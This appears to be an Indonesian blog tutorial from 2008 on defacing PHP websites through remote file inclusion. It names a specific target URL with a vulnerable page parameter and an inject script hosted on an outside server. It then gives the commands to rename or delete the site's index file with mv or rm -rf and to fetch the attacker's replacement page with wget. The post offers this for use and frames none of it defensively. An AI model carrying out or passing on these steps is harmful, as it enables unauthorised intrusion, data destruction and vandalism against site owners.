Jumat, 05 September 2008

deface web berbasis PHP

Dalam tutorial singkat ini akan di bahas mengenai deface web berbasis PHP.

Langsung saja.

kita anggap kamu sudah tahu mengenai teknik inject menggunakan injeckt PHP dan

mendapatkan sasarannya.

Contoh :

Sasaran kita adalah :

http://www.mutznutz-nightclub.co.uk/index3.php?page=

kita singkat sebagai : (target)



dan file injeckt nya

http://geocities.com/finalheaven_ardi/final.txt?&cmd=ls -alF;uname -a

kita singkat : (inject)



langkah - langkah deface sbb :

Pertama :

Pindahkan atau ubah (rename file index.php/htm/html) default website target

perintahnya :

(target)=(inject)=mv index.php xxx.php

atau

(target)=(inject)=mv index.htm xxx.htm

atau

(target)=(inject)=mv indext.html xxx.html

tergantung index default website tersebut menggunakan php.htm atau html asalkan

dapat kita cari file nya yang berawalan dengan kata index dan xxx. itu terserah

kita akan kita rename dengan nama lain.



Kalau tidak kita rubahpun yang lebih kejam lagi yaitu dengan menghapus index-nya

perintahnya :

(target)=(inject)=rm -rf index.xxx

( xxx : adalah extension belakang index seperti php atau htm atau html )



setelah itu tinggal kita upload file index kita

contoh file index kita terletak pada :

http://www.geocities.com/ardi_terror/index.htm

perintahnya :

(target)=(inject)=wget http://www.geocities.com/f1nal_he4ven/index.htm

jika selesai, maka selesai sudah proses deface pada website tersebut dengan mengubah

tampilan index asli milik website tersebut dengan index milik kita

sangat sederhana bukan...???

Tidak ada komentar: